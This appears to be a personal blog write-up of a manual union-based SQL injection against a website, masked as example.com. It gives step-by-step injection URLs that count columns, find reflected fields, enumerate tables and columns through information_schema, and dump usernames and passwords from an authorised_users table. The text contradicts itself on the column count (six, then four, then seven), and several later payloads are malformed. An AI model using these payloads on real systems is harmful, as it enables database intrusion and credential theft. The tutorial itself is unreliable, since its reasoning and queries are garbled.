SQL Injection (Union Based ) Leads to Dump (Fetch) the Sensitive Information.

Hello all, This is my first write up in this medium. I am going to share how I hacked the web application through the SQL injection vulnerability. I have been testing the private website and consider that website was https://example.com
On that website, I check for SQLi vulnerability. I was interested to test parameter functionality something like this id = 1.

I found the injection point. Put an ‘ (Apostrophe) at the injection point.
Example: https://example.com/products.php?id=5 ( <= ) or ( ‘ ) This type of website is needed in order to do this trick.

But unfortunately, this site cannot properly validate the strings. So, this site shows some error message. Like this,

So this is the lead to SQL injection vulnerability.

NOTE: A lot of tools have come out to find SQL Injection attacks for example SQLmap like this. But I am testing for manual and also it's my interest. but I used one browser extension that’s it.

ORDER BY -> the command use of finding how many columns in that website.

https://example.com/products.php?id=5 Order By 8 — +

This is an error message, so here reduce the number like this 7,6,5,4

I put number 6 the site is normal loading nothing error message so the site only 6 column has.

Determining the number of columns required in an SQL injection UNION attack. Union select -> the command uses of find and shows the vulnerable columns. Finding which columns are vulnerable.

So I know that there are four columns now I have to find out which ones are vulnerable to injection. To do this I will use the UNION and SELECT queries while keeping the double null ( — ) at the end of the string.

https://example.com/products.php?id=5'+Union+Select+1,2,3,4,5,6 — +

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database.2,4 these three columns vulnerable.

I can inject the SQL query in the 2nd column. How to find the name of the database and what version of SQL the website is using by using queries to exploit.

https://example.com/products.php?id=5'+Union+Select+1, concat(@@version, Database(), User()),3,4,5,6 — +

Then, I can extract the table names using the SQL Injection query.

https://example.com/products.php?id=-1'+union select 1(select+group_concat(table_name+separator+0x3c62723e)+from+information_schema. tables+where+tables_schema=database ()),3,4,5,6,7 — +

Extract all the table names. So this is the Injection query, https://example.com/products.php?id=-1'+union select+1(select+group_concat(column_name+separator+0x3c62723e)+From+information_schema.column+where+tables_name=authorised_user()(Change the String because firewall blocks)),3,4,5,6,7 — +

Then dump the data from authorized user tables,

https://example.com/products.php?id=-1'+union+select+1(select+group_concat (username, password+separator+0x3c62723e) +From+authorised_users ()),3,4,5,6,7 — +

Finally, we dump the maximum information about this site. I have reported to that website.

Thanks for reading..!